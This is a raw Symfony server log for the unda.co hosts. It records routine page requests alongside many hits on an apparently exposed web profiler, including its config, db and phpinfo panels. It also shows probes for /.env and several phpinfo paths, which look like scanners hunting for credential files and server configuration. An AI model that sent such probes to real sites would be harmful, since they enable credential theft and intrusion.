[2025-12-20 08:59:11] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 08:59:20] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"5ebd67","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/5ebd67","method":"GET"} []
[2025-12-20 08:59:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=199.45.154.156&limit=10","method":"GET"} []
[2025-12-20 08:59:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=199.45.154.156&limit=10","method":"GET"} []
[2025-12-20 09:00:08] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 09:00:08] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 09:00:09] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 09:00:09] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 09:02:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2263c2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2263c2?panel=cache","method":"GET"} []
[2025-12-20 09:02:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 09:03:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"025fac","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/025fac?panel=config","method":"GET"} []
[2025-12-20 09:03:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 09:05:00] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 09:05:01] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 09:06:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b?panel=cache","method":"GET"} []
[2025-12-20 09:06:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 09:14:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 09:15:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2","method":"GET"} []
[2025-12-20 09:15:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 09:15:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2?panel=twig","method":"GET"} []
[2025-12-20 09:15:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 09:15:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2?panel=cache","method":"GET"} []
[2025-12-20 09:15:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 09:17:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=35.198.60.231&limit=10","method":"GET"} []
[2025-12-20 09:17:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=35.198.60.231&limit=10","method":"GET"} []
[2025-12-20 09:19:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=cache","method":"GET"} []
[2025-12-20 09:19:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 09:21:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f44717","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/f44717?panel=dump","method":"GET"} []
[2025-12-20 09:21:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-20 09:23:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=cache","method":"GET"} []
[2025-12-20 09:23:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 09:28:27] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"OPTIONS"} []
[2025-12-20 09:29:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a2d62","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a2d62?panel=router","method":"GET"} []
[2025-12-20 09:29:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-20 09:30:28] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 09:34:42] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 09:40:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2?panel=security","method":"GET"} []
[2025-12-20 09:40:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 09:44:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 09:44:21] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-20 09:44:46] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
[2025-12-20 09:45:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b","method":"GET"} []
[2025-12-20 09:45:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 09:46:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9b6635","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9b6635?panel=request","method":"GET"} []
[2025-12-20 09:46:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 09:52:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=time","method":"GET"} []
[2025-12-20 09:52:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 09:53:41] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 09:59:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c?panel=config","method":"GET"} []
[2025-12-20 09:59:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 10:00:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1702ec","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/1702ec?panel=db","method":"GET"} []
[2025-12-20 10:00:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 10:02:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6618a5","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/6618a5?panel=exception","method":"GET"} []
[2025-12-20 10:02:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-20 10:05:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=cache","method":"GET"} []
[2025-12-20 10:05:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 10:07:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"130ea7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/130ea7?panel=twig","method":"GET"} []
[2025-12-20 10:07:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 10:08:40] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 10:08:40] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 10:13:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"15095c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/15095c?panel=cache","method":"GET"} []
[2025-12-20 10:13:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 10:19:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"130ea7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/130ea7?panel=config","method":"GET"} []
[2025-12-20 10:19:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 10:23:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 10:23:53] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 10:23:53] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:23:53] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:23:53] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 10:23:53] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 10:23:53] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 10:23:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 10:23:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 10:23:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:23:54] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:23:54] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 10:23:54] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 10:23:54] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 10:23:54] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 10:23:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 10:23:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:23:54] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:23:54] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 10:23:54] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 10:23:54] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 10:23:55] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 10:23:55] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 10:23:55] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:23:55] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:23:55] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 10:23:55] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 10:23:55] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 10:23:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 10:24:00] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 10:24:00] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 10:24:00] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:24:00] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:24:00] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 10:24:00] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 10:24:00] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 10:24:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 10:24:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 10:24:07] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 10:24:07] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 10:24:07] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:24:07] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:24:07] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 10:24:07] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 10:24:07] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 10:24:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 10:24:12] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 10:24:12] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 10:24:12] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:24:12] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:24:12] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 10:24:12] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 10:24:12] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 10:24:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 10:24:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-20 10:24:18] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 10:24:18] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:24:18] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 10:24:18] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 10:24:18] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 10:24:18] security.DEBUG: Calling Authentication entry point. [] []
